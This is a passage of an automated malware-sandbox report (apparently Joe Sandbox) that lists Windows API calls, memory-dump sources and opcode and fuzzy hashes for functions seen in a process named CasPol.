          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: DeleteFile
          • String ID:
          • API String ID: 4033686569-0
          • Opcode ID: 81dbb0593a3a8eb59adaf4886f0cc9eec20f120ea0139dbdf2d4737b43a1b7bb
          • Instruction ID: 274a405261b9aa0b519527b74e89601c6ffb5ecd0eb11e4e9710c58436570d76
          • Opcode Fuzzy Hash: 81dbb0593a3a8eb59adaf4886f0cc9eec20f120ea0139dbdf2d4737b43a1b7bb
          • Instruction Fuzzy Hash: F62190725093809FD712CB25DC45B46BFA8EF42220F0984DAD885CF263C229E408CB62
          APIs
          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2180A632
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: DuplicateHandle
          • String ID:
          • API String ID: 3793708945-0
          • Opcode ID: 3383bd10eb4425bdecaf316dc6ba81af4d877b90ca3c7ed4bed876305a888687
          • Instruction ID: fb994b9e0ebb704025fa528eaafa21468095017bc88e6b3c27c12ca7780f1195
          • Opcode Fuzzy Hash: 3383bd10eb4425bdecaf316dc6ba81af4d877b90ca3c7ed4bed876305a888687
          • Instruction Fuzzy Hash: 98118472409780AFDB228F51DD44B52FFF4EF4A310F0885DAED858B163C275A518DB62
          APIs
          • ReadFile.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D61111
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: bd05550339ee5a2eb1809fe05111e9971fcca6dec199439e4bd2b13324c19ac9
          • Instruction ID: dc2766a0df21d54710c4792c2704dca6dba6554a9ac979ff9a908fc3dbe29a07
          • Opcode Fuzzy Hash: bd05550339ee5a2eb1809fe05111e9971fcca6dec199439e4bd2b13324c19ac9
          • Instruction Fuzzy Hash: A1112775500300AFEB21DF11DC44F66FBA8EF04724F08C49AE9848B241C378A448CFB6
          APIs
          • DeleteFileA.KERNEL32(?,00000EA8), ref: 23D615BF
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: DeleteFile
          • String ID:
          • API String ID: 4033686569-0
          • Opcode ID: 3415f41ce66f5b7b880bfc3d656f83cc06e11ead47d9d900370e51bf7ab81c16
          • Instruction ID: c51b8398af9396a5f5a29c9405333d938ca050dbf89dc798a30a3823310c9362
          • Opcode Fuzzy Hash: 3415f41ce66f5b7b880bfc3d656f83cc06e11ead47d9d900370e51bf7ab81c16
          • Instruction Fuzzy Hash: 18110675600200AFE7209B15EC45FB6FBACDF04724F0880AAFD458A381D7A4B544CF66
          APIs
          • RegOpenKeyExA.KERNEL32(?,00000EA8), ref: 23D6049F
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: Open
          • String ID:
          • API String ID: 71445658-0
          • Opcode ID: 0431aab5d9f2d53df62d7d5a737fb479603ed61cb154e9ea61603eb07b9e7d63
          • Instruction ID: a7f438787cb6a7ce5cdbedaafe1a72a4d910fc32d161024d38e863e642986095
          • Opcode Fuzzy Hash: 0431aab5d9f2d53df62d7d5a737fb479603ed61cb154e9ea61603eb07b9e7d63
          • Instruction Fuzzy Hash: 6411EF35100200AFEB319F21DC85F66FBA8EF04724F08849AFE845A691D3B5B548CBA6
          APIs
          • PostMessageW.USER32(?,?,?,?), ref: 2180BC61
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: MessagePost
          • String ID:
          • API String ID: 410705778-0
          • Opcode ID: 453bbe248a47b2920cf2a5c90337b6a2c2ce185cf115c4a8283583c7f882bc5b
          • Instruction ID: 35c8150dedf14221750e7573e600856e2393042069da381b911860e9c53ce052
          • Opcode Fuzzy Hash: 453bbe248a47b2920cf2a5c90337b6a2c2ce185cf115c4a8283583c7f882bc5b
          • Instruction Fuzzy Hash: DD11D376509380AFD7228F21DC85B52FFB4EF06320F0884DEED858B163D265A458DB62
          APIs
          • SendMessageW.USER32(?,?,?,?), ref: 2180B8E9
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: c8c446e59bbc07300b99aa30774813e06b6bcbe69bd9a85d49f0d2333e5a7d0f
          • Instruction ID: 3fc61983b039ab19b6958c8f0e5a455772ab26920a5c89e05cb953070d6f7dd9
          • Opcode Fuzzy Hash: c8c446e59bbc07300b99aa30774813e06b6bcbe69bd9a85d49f0d2333e5a7d0f
          • Instruction Fuzzy Hash: 6711AF764097C4AFDB228B21DC54A52BFB0EF07320F0D84CAEDC44F263D265A958DB62
          APIs
          • DispatchMessageW.USER32(?), ref: 2180BF18
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: DispatchMessage
          • String ID:
          • API String ID: 2061451462-0
          • Opcode ID: 19a5fb1abc80a618be7c76c8f10e641d07b0d704e726284f0eb18b4a59001313
          • Instruction ID: 909ea450b8b3acb86e8fbc277ab7d431d84cc440be9ca8c8d8145df4a91971d4
          • Opcode Fuzzy Hash: 19a5fb1abc80a618be7c76c8f10e641d07b0d704e726284f0eb18b4a59001313
          • Instruction Fuzzy Hash: 90118E754093C4AFD7138B25DC84B62BFB4EF47624F0980DEED858F263D2656908CB62
          APIs
          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 2180B832
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: CreateFromIconResource
          • String ID:
          • API String ID: 3668623891-0
          • Opcode ID: 178b3cb132313b191c32da2e5243f98c2b815990e8dee3d3451055cde651cf77
          • Instruction ID: 69895bb5f5f0faa12ba5e32efe439251d1d1e05e3816c550af6bc1892f3dc290
          • Opcode Fuzzy Hash: 178b3cb132313b191c32da2e5243f98c2b815990e8dee3d3451055cde651cf77
          • Instruction Fuzzy Hash: A311A236404384AFCB22CF51DC84A56FFB4EF0A320F08849EE9858B562D375A418DB61
          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: Initialize
          • String ID:
          • API String ID: 2538663250-0
          • Opcode ID: 620f7d72438934b28306f24886735639e8992253be1adb58de13a03372663b27
          • Instruction ID: 521f732aaadfc6fe2a097b2ae0488c17b254470bb3edcc1ba74d3d75b430599d
          • Opcode Fuzzy Hash: 620f7d72438934b28306f24886735639e8992253be1adb58de13a03372663b27
          • Instruction Fuzzy Hash: FF119D71409384AFD7128F11DC88B56BFB4EF06324F0884DAED849F293D279A509CB62
          APIs
          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 23D62DAA
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: LookupPrivilegeValue
          • String ID:
          • API String ID: 3899507212-0
          • Opcode ID: d5bb2c74fbf5acc1885c5c298b583d5ea692af0e5c078e3df9d01a55526c6ecf
          • Instruction ID: b1e46150ccb152b44482f914a90ebac4d8304aeb7de2fd806e8cf6b6d2ab8021
          • Opcode Fuzzy Hash: d5bb2c74fbf5acc1885c5c298b583d5ea692af0e5c078e3df9d01a55526c6ecf
          • Instruction Fuzzy Hash: 0B113C756002019FDB50DF25EC85B56BBE8EF04620F08C4AAED99DB242D675E444CFA2
          APIs
          • GetFileType.KERNEL32(?,00000EA8,9E0939A2,00000000,00000000,00000000,00000000), ref: 23D61045
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FileType
          • String ID:
          • API String ID: 3081899298-0
          • Opcode ID: bb16b79c91a6552ffe23792d0fb6fc2994114421c4a9cb616260f0c7e14d0ee9
          • Instruction ID: acc4e5d02a64701c344ab834d23e4370518e6faef4fdff8d275392801b10ec43
          • Opcode Fuzzy Hash: bb16b79c91a6552ffe23792d0fb6fc2994114421c4a9cb616260f0c7e14d0ee9
          • Instruction Fuzzy Hash: 3001D675500644AFEB20DB12DC44FA6F79CDF04724F48C09AED849B242D368A554CBB6
          APIs
          • CreateDirectoryW.KERNEL32(?,?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D60E5F
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: CreateDirectory
          • String ID:
          • API String ID: 4241100979-0
          • Opcode ID: acd05a7727a49a66ab1898dc3bc0a3922f80dc2c57e0f67944407cd63c183a5a
          • Instruction ID: 6810a0c072b7d5cd5c4428a3c9017a7fb407caf2cd9c58ebba4e7398921e0228
          • Opcode Fuzzy Hash: acd05a7727a49a66ab1898dc3bc0a3922f80dc2c57e0f67944407cd63c183a5a
          • Instruction Fuzzy Hash: 06118E75A042009FDB50DF25E984B5ABBD8EF04620F88C4AAED48CB242D274E544CF61
          APIs
          • K32EnumProcesses.KERNEL32(?,?,?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D6309E
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: EnumProcesses
          • String ID:
          • API String ID: 84517404-0
          • Opcode ID: 7e18c6d0dc1b8e7f650a79b8db01befcd10ef7ee69248bc68743f9d37e961c5a
          • Instruction ID: 2e3139e342da889208d160a9a7566e0675d36e5e8ed3bfd6be0aca002670ad33
          • Opcode Fuzzy Hash: 7e18c6d0dc1b8e7f650a79b8db01befcd10ef7ee69248bc68743f9d37e961c5a
          • Instruction Fuzzy Hash: 641161756006049FDB10CF66E984B56FBE8EF04620F08C4AEED99CB262D775E458CF62
          APIs
          • SetWindowLongW.USER32(?,?,?), ref: 2180A9CE
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: LongWindow
          • String ID:
          • API String ID: 1378638983-0
          • Opcode ID: 202b74ed72a629db234e701338dbb7fdf79682f6827f2cb0bb4fe5dc411ff1b0
          • Instruction ID: 596c0980b3ac51297f5b4934acba286667be55a22d1e6d6aee56b61a1c0509f2
          • Opcode Fuzzy Hash: 202b74ed72a629db234e701338dbb7fdf79682f6827f2cb0bb4fe5dc411ff1b0
          • Instruction Fuzzy Hash: C811C236508384AFC7228F15DC88B52FFB4EF06320F09C0DAED854B263C275A448CB62
          APIs
          • GetTempFileNameW.KERNEL32(?,00000EA8,?,?), ref: 23D6122A
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FileNameTemp
          • String ID:
          • API String ID: 745986568-0
          • Opcode ID: 562e2755cc38e3e891eea3d967d08b98fee91bf467abba277eda7fc5dd0a81a9
          • Instruction ID: a16b89e92f6aaaf2cd56a2d67d1a3c5687f3dffb28a68513d4e97a2fa0b8e951
          • Opcode Fuzzy Hash: 562e2755cc38e3e891eea3d967d08b98fee91bf467abba277eda7fc5dd0a81a9
          • Instruction Fuzzy Hash: 5801B172600200AFD310DF16DD45B36FBA8FB88A20F14851AED489B741E731F515CBE2
          APIs
          • FormatMessageW.KERNEL32(?,00000EA8,?,?), ref: 23D629B2
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: FormatMessage
          • String ID:
          • API String ID: 1306739567-0
          • Opcode ID: 9c8fbcd2c088d7c1022ccc3cc903e7a52d23477ee2acb6bf0c46c5253d2ab73d
          • Instruction ID: 90b97341ac860e3445a1d06f40ac919c0dae64b834c9297e42fd46efe49ce7e8
          • Opcode Fuzzy Hash: 9c8fbcd2c088d7c1022ccc3cc903e7a52d23477ee2acb6bf0c46c5253d2ab73d
          • Instruction Fuzzy Hash: 5E01B172600200AFD310DF16DD45B36FBA8EB88A20F14851AED489B741E731F515CBE2
          APIs
          • DeleteFileW.KERNEL32(?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 23D6006C
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: DeleteFile
          • String ID:
          • API String ID: 4033686569-0
          • Opcode ID: 8c2ab70e003394eb377d8255883967f7ef5a46c917f494c7139462d8e0d19cd3
          • Instruction ID: 8762300cc960c408970726d7743d1e5228c8a898f55e3321586f1dd4d574f306
          • Opcode Fuzzy Hash: 8c2ab70e003394eb377d8255883967f7ef5a46c917f494c7139462d8e0d19cd3
          • Instruction Fuzzy Hash: 97019E75A046049FDB10DF26E985B66BB98EF40620F48C4AADD88CB342D675E454CF62
          APIs
          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2180A632
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: DuplicateHandle
          • String ID:
          • API String ID: 3793708945-0
          • Opcode ID: f2108c4b3bd0ed64d1caf19503d1ea979b984cee320f5791cd32e433bc41b54a
          • Instruction ID: 84322472138053ccf4fe3b736b7ea4a580b60c1fcb40be46a5d47aa057e53c52
          • Opcode Fuzzy Hash: f2108c4b3bd0ed64d1caf19503d1ea979b984cee320f5791cd32e433bc41b54a
          • Instruction Fuzzy Hash: 6B018B36400704DFDB218F51DD84B56FBE4EF48720F08C9AAED898A662C376E014DF62
          APIs
          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 2180B832
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: CreateFromIconResource
          • String ID:
          • API String ID: 3668623891-0
          • Opcode ID: e86da77db88f8a6baf4947c193317bdcaeb1b6986c6610fd859aa9eddcfbc921
          • Instruction ID: 0f0ddd3ad9d5b9a371cd65457277b94d0249e9773b7a793a8253c7579851e969
          • Opcode Fuzzy Hash: e86da77db88f8a6baf4947c193317bdcaeb1b6986c6610fd859aa9eddcfbc921
          • Instruction Fuzzy Hash: 0401A136400704DFDB318F51DC84B66FBA0EF08320F08C46AED854B662D375A154DF62
          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: FindWindow
          • String ID:
          • API String ID: 134000473-0
          • Opcode ID: 576dfb04fd6c02ecf8e0dd681d260e0894f2a7c9cd37230d116584416bbb5fb4
          • Instruction ID: d35b89a610db18aeb3872c33203f00dbe3a0167fbfe701b5d7139615704e289b
          • Opcode Fuzzy Hash: 576dfb04fd6c02ecf8e0dd681d260e0894f2a7c9cd37230d116584416bbb5fb4
          • Instruction Fuzzy Hash: 7B017179600648DFEB10CF15DCC9B26FBD8EF05724F4880A9DD448B352D275E444CAA2
          APIs
          • CreateActCtxA.KERNEL32(?,00000EA8,?,?), ref: 2180B092
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: Create
          • String ID:
          • API String ID: 2289755597-0
          • Opcode ID: 35476bea6c22a62a8b887c28be633ab53fea3fe7b8b5c1c648a19fc6485dddf3
          • Instruction ID: 8087809cf8a38ea546e0d11180e0b896f2019bc056ca5836ca07d00854b63ea8
          • Opcode Fuzzy Hash: 35476bea6c22a62a8b887c28be633ab53fea3fe7b8b5c1c648a19fc6485dddf3
          • Instruction Fuzzy Hash: 8701A271600200ABD310DF16DC46B36FBA4FB88A20F148159ED485B741E775F515CBE6
          APIs
          • DnsQuery_A.DNSAPI(?,00000EA8,?,?), ref: 23D61972
          Memory Dump Source
          • Source File: 00000005.00000002.28419280615.0000000023D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 23D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23d60000_CasPol.jbxd
          Similarity
          • API ID: Query_
          • String ID:
          • API String ID: 428220571-0
          • Opcode ID: 332edc687dc896957c0540803cfb49a6d02cd3e39986aff4cc4693b4e9821458
          • Instruction ID: 841d4e3c7b7e17e8b4bb568e9d14afc004b44c18d707d0f393e436e91f5c9416
          • Opcode Fuzzy Hash: 332edc687dc896957c0540803cfb49a6d02cd3e39986aff4cc4693b4e9821458
          • Instruction Fuzzy Hash: 3401A272600200ABD310DF16DC46F36FBA4FB88A20F14811AED485B741E771F525CBE6
          APIs
          • PostMessageW.USER32(?,?,?,?), ref: 2180BC61
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: MessagePost
          • String ID:
          • API String ID: 410705778-0
          • Opcode ID: e9272551943dacdb96b8ad0806826bf8da2d9be3829f97783bfad28be7fd38ca
          • Instruction ID: bda0a9cd91f3ba641ff01f88032801f3911dbd294eabaaa1bdbbd4e396c16563
          • Opcode Fuzzy Hash: e9272551943dacdb96b8ad0806826bf8da2d9be3829f97783bfad28be7fd38ca
          • Instruction Fuzzy Hash: 3F017139500608DFDB218F15DC84B66FBA4EF05320F08C4AEED454B692D775E454DBA2
          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: Initialize
          • String ID:
          • API String ID: 2538663250-0
          • Opcode ID: 87e86cacb81e995ad63d970a9f8cc809bac5409b71c23321fa32ef6001caab59
          • Instruction ID: 41c860aadec61f2ede95228048e19eebc1fb71f3640278d2588091f725599972
          • Opcode Fuzzy Hash: 87e86cacb81e995ad63d970a9f8cc809bac5409b71c23321fa32ef6001caab59
          • Instruction Fuzzy Hash: 7E01D135900248DFDB10CF15DD88B65FBA4EF05320F48C4AADD489F342D379A648CBA2
          APIs
          • SendMessageW.USER32(?,?,?,?), ref: 2180B8E9
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: 94c64c2cae71e3a03007e136f631339ca4f108253511186ee402300715a7c59c
          • Instruction ID: 8d3427cc6cc4817a961b8e03baedff9139f1bb1ae60922f677a0964bf802c292
          • Opcode Fuzzy Hash: 94c64c2cae71e3a03007e136f631339ca4f108253511186ee402300715a7c59c
          • Instruction Fuzzy Hash: AF018F39500708DFDB318F06DC84B25FBA0EF15320F08C49ADD444B362E375A554DBA2
          APIs
          • SetWindowLongW.USER32(?,?,?), ref: 2180A9CE
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: LongWindow
          • String ID:
          • API String ID: 1378638983-0
          • Opcode ID: 0d71086a8ad3aa52baeb82fa0118d054293f689c1cfe6c58e49efd1d5d015282
          • Instruction ID: 5d0bbaf5d3a4c3f3574d50069ff05238828354f9e7ed931096d09901b828cf8a
          • Opcode Fuzzy Hash: 0d71086a8ad3aa52baeb82fa0118d054293f689c1cfe6c58e49efd1d5d015282
          • Instruction Fuzzy Hash: 7C01D139600648DFDB208F05DC84B16FBA0EF05320F08C1AADD894B752C3B5A488DFA2
          APIs
          • DispatchMessageW.USER32(?), ref: 2180BF18
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: DispatchMessage
          • String ID:
          • API String ID: 2061451462-0
          • Opcode ID: 7d4f015efa08a9a8c9a8e5624600367b89a75bc9727c8ffbb7272a1763d8ac64
          • Instruction ID: 7c59ffde3c94f163dea48f0d9b6c0db5fe3e45c3294df3ec906be8d8b0bff1f4
          • Opcode Fuzzy Hash: 7d4f015efa08a9a8c9a8e5624600367b89a75bc9727c8ffbb7272a1763d8ac64
          • Instruction Fuzzy Hash: 53F0AF39500248DFDB208F05DC89B65FBA4EF05725F48C4AAED494B352E37AA944CEA2
          APIs
          • SetErrorMode.KERNEL32(?,9E0939A2,00000000,?,?,?,?,?,?,?,?,682E3C58), ref: 2180A3A4
          Memory Dump Source
          • Source File: 00000005.00000002.28396928330.000000002180A000.00000040.00000800.00020000.00000000.sdmp, Offset: 2180A000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_2180a000_CasPol.jbxd
          Similarity
          • API ID: ErrorMode
          • String ID:
          • API String ID: 2340568224-0
          • Opcode ID: 7d4f015efa08a9a8c9a8e5624600367b89a75bc9727c8ffbb7272a1763d8ac64
          • Instruction ID: 05038fdaaf5433c7e8f2ed7aa42100c669b21f5ba02607e606b1a2be838204d6
          • Opcode Fuzzy Hash: 7d4f015efa08a9a8c9a8e5624600367b89a75bc9727c8ffbb7272a1763d8ac64
          • Instruction Fuzzy Hash: 5CF08C39500248DFDB208F15DD88B66FBA4EF05325F48C0AADD484B752D2B9A544CBA2
          Strings
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID: r*+
          • API String ID: 0-3221063712
          • Opcode ID: 30f249962b3befd9d75dd49169e2a3d0a79af953cb0d2e0151dbe5093c3f2774
          • Instruction ID: 2d5e9bb55f4ef814354a4cdc7ebbe4d1f662f0d1b7b1cad10d35820115cee10e
          • Opcode Fuzzy Hash: 30f249962b3befd9d75dd49169e2a3d0a79af953cb0d2e0151dbe5093c3f2774
          • Instruction Fuzzy Hash: 35715932E1828DCFCB04DFA4C485AAEBBB1EF85314F1080BAD5119F2A4D7349A41CF52
          Strings
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID: :@~g
          • API String ID: 0-2887969434
          • Opcode ID: 690891deb17bbc41487bf0e0bb476582293c8508f7975f3be13ddf0bc938a197
          • Instruction ID: 154973ac6ebaceef93ccf090af1a34d4f0d1320d1ba3eb91a6baaa24739ed650
          • Opcode Fuzzy Hash: 690891deb17bbc41487bf0e0bb476582293c8508f7975f3be13ddf0bc938a197
          • Instruction Fuzzy Hash: 85516E76A04209CFDB04DF24C4A4A6D77F2FF8D314F1480A9D5469B764DB749D41CB82
          Strings
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID: 0-3916222277
          • Opcode ID: 030f51f866c35e13d64e48a275aed68f1ab6c689f03cb597e1cf53d5dd8c0239
          • Instruction ID: 061d62beacee16555155fe0233b6b612320c5a58a2e44de798100ce0ca4e6c72
          • Opcode Fuzzy Hash: 030f51f866c35e13d64e48a275aed68f1ab6c689f03cb597e1cf53d5dd8c0239
          • Instruction Fuzzy Hash: D641D132F2419DCBDB10DF68C88099EB7A2EBC9219F28C5B6C415DF615D735E8428B82
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 68d8978d78b0d3897ba56e48701af360bc84f08a3db5d556022f8ba2fabee8c7
          • Instruction ID: 6df58de694209ace9c80872d6fc53b95c7c9417fb793c7f83a3b8d8974c563d4
          • Opcode Fuzzy Hash: 68d8978d78b0d3897ba56e48701af360bc84f08a3db5d556022f8ba2fabee8c7
          • Instruction Fuzzy Hash: A222F138A04649CFC764DF24C484A6AB7F2FF48304F1489AAD85A9B765DB34ED86CF41
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 25fb49add0f226f863e12d23640914b2f76ea30950ca900cbed4f36be5dde249
          • Instruction ID: 8539b0bbdca97f19d794b0b5d980c519e4cba83b8d1bb2e2bb60846aca5139c1
          • Opcode Fuzzy Hash: 25fb49add0f226f863e12d23640914b2f76ea30950ca900cbed4f36be5dde249
          • Instruction Fuzzy Hash: A9815F32A00619CFCB15DF24C890A9AB7B2EF49304F45C5E5D909AF216DB71EE86CF81
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 35c6492815a3a0c02b60f209ff75d677f77733dd6e1f2dce4a4e87bccf19b869
          • Instruction ID: 49a5e09e3c57744ab4409853c90887a79b5f4e5cabf1021cf46e961ce85e152a
          • Opcode Fuzzy Hash: 35c6492815a3a0c02b60f209ff75d677f77733dd6e1f2dce4a4e87bccf19b869
